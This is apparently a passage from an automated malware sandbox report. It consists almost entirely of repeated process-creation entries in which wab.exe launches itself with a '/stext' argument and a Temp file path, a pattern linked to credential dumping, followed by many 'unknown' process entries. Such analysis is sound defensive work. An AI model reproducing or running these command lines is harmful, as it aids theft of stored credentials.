              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
